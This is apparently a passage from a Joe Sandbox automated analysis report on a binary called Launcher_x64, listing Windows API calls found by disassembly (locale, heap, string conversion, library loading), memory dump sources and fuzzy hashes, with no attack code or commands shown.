                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00D2897D,00000001,?,?,-00000050,?,00D28483,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00D28968
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1F547: EnterCriticalSection.KERNEL32(?,?,00D1CD41,00000000,00D3E728,0000000C,00D1CCFA,00001000,?,00D244CA,00001000,?,00D235B1,00000001,00000364,?), ref: 00D1F556
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00D2439A,00000001,00D3EBA0,0000000C,00D23DA8,-00000050), ref: 00D243DF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00D28A9D,00000001,?,?,?,00D284DD,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00D28A89
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00D1E2A3,?,20001004,00000000,00000002,?,?,00D1D1B5), ref: 00D23EE0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001663D), ref: 00D16521
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4d0b5ff96482461a80554ab79d908f2287f0ed5455ffb9e621f52d67ccec4d45
                                                                                                                                                                                                                                                                                        • Instruction ID: 3e154ef0cb8451951d1aeb0df47b0fc69a6b48971588c73f7fc0750dcfaa175a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d0b5ff96482461a80554ab79d908f2287f0ed5455ffb9e621f52d67ccec4d45
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55A00178602305CBA7548F35BB0A3293AAAAA86691745406DA509C5260EA2894509E21
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 835e93e315a1489a60edd3b4a615a23b8f0ac8c2783df1799a65006cb9cc36b9
                                                                                                                                                                                                                                                                                        • Instruction ID: a13d6d7cf92c177c07117e86705f87953345e8d68e71d990b27cf1f3b27f3829
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 835e93e315a1489a60edd3b4a615a23b8f0ac8c2783df1799a65006cb9cc36b9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C519AB4D0020E9FCB44DFA8D591AEEBBF4EB09350F24845AE859FB350D734AA41CB65
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 16d1b4109c38f512293157fddd189da778e56657208dd0f34553f01270312c15
                                                                                                                                                                                                                                                                                        • Instruction ID: adc3eda15ee5b26e7fff434504f08729c65e9989f075e610f3babd6e210943ef
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16d1b4109c38f512293157fddd189da778e56657208dd0f34553f01270312c15
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73D06C3E641A58AFC210CF4AE440D41F7B8FB8A670B158066EA0993B20C231F811CEE0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 127012223-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 199ad5061f37f1dff7dd5a8ba085f044f5af52072086aab1b28030a723268f73
                                                                                                                                                                                                                                                                                        • Instruction ID: c0d97c1af6f38bf4fe7d2ef02e22764569d7bbfc72b08921a31e10bcbbacc75b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 199ad5061f37f1dff7dd5a8ba085f044f5af52072086aab1b28030a723268f73
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C771D072E00309ABDF259A948D42BBF7BBAEF55310F2C4019EA44A7281DB75DC44C7B0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00D16AB0
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D16ADC
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00D16B1B
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D16B38
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D16B77
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D16B94
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D16BD6
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D16BF9
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b2806f2c04466e296f1c9ed7b428307fa531ff5e478aa03248aac30c30efc4ef
                                                                                                                                                                                                                                                                                        • Instruction ID: 9089ab254ef06a33ee206fd136aa99a1709e548ff1c5927491d4f9221feaf509
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2806f2c04466e296f1c9ed7b428307fa531ff5e478aa03248aac30c30efc4ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76517EB260020ABBEB205F90EC45FEB7FAAEF44754F194428F955E6190DB74DC908BB0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
                                                                                                                                                                                                                                                                                        • Instruction ID: 65ebb62169b0d1470ed381ec3e6d5d8fc2896633500cbe8e1eb3ccf3e30ec3b5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9B15972A00375DFDB12CF68EC81BAE7FA5EF65318F284155E944AB282D274E901C7B4
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17977
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00D1797F
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17A08
                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00D17A33
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17A88
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                        • Opcode ID: 71568003e4e51a1dd5a26318f109360a913ae8bb0b8c2c17d129ee6b53c3ce2b
                                                                                                                                                                                                                                                                                        • Instruction ID: dafaad03d73ca9af5bbd0b93b0f7913fd6c3df624b2423d65a8dabfb07e0cdde
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71568003e4e51a1dd5a26318f109360a913ae8bb0b8c2c17d129ee6b53c3ce2b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F41E434A04218ABCF11DF68E885ADE7BB5EF45324F188055E8199B362CB319E95CFB0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D16CC1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D16CCF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00D16CE0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                                                        • Opcode ID: ce9f8459bd8c5007804482157522f1dcf2f4176c8c87f6823be2acd2fb4f4b14
                                                                                                                                                                                                                                                                                        • Instruction ID: e074455a983fb0cb76c8cee27ac77675357b8b714d60a76fa3e4ed5c5b367de7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce9f8459bd8c5007804482157522f1dcf2f4176c8c87f6823be2acd2fb4f4b14
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8D0C77E6953205F83105FB57C0DC553EA5EB057117060466F845D3350D6B418558FB2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00D21FA5,00D17361,00D16681), ref: 00D21FBC
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D21FCA
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D21FE3
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00D21FA5,00D17361,00D16681), ref: 00D22035
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00D22945
                                                                                                                                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00D22BBE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                        • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E7FA7683,?,?,00000000,00D33374,000000FF,?,00D1CAFD,00D1C9E4,?,00D1CB99,00000000), ref: 00D1CA71
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D1CA83
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D33374,000000FF,?,00D1CAFD,00D1C9E4,?,00D1CB99,00000000), ref: 00D1CAA5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D24952
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D24A1B
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24A82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D231C1: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D122A9,?,?,00D03E32,00001000,?,00D03D7A), ref: 00D231F3
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24A95
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24AA2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1423051803-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00D15C93
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15CB2
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15CE0
                                                                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15D3B
                                                                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15D52
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 66001078-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00D1295D
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00D12968
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00D129D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1285F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D12877
                                                                                                                                                                                                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00D12983
                                                                                                                                                                                                                                                                                        • _Yarn.LIBCPMT ref: 00D12999
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D2DDCD,00000000,?,00D421B8,?,?,?,00D2DD04,00000004,InitializeCriticalSectionEx,00D3808C,00D38094), ref: 00D2DD3E
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00D2DDCD,00000000,?,00D421B8,?,?,?,00D2DD04,00000004,InitializeCriticalSectionEx,00D3808C,00D38094,00000000,?,00D22E6C), ref: 00D2DD48
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D2DD70
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(E7FA7683,00000000,00000000,?), ref: 00D2B13A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D2B38C
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D2B3D2
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00D2B475
Memory Dump Source
• Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00D28F67
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00D28F6E
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00D28FA8
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00D28FAF
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1913693674-0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00D2A301
  • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D2A339
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D2A359
Memory Dump Source
• Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
APIs
• __EH_prolog3.LIBCMT ref: 00D143A0
• std::_Lockit::_Lockit.LIBCPMT ref: 00D143AA
  • Part of subcall function 00D04D90: std::_Lockit::_Lockit.LIBCPMT ref: 00D04DBE
  • Part of subcall function 00D04D90: std::_Lockit::~_Lockit.LIBCPMT ref: 00D04DE9
• codecvt.LIBCPMT ref: 00D143E4
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D1441B
Memory Dump Source
• Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
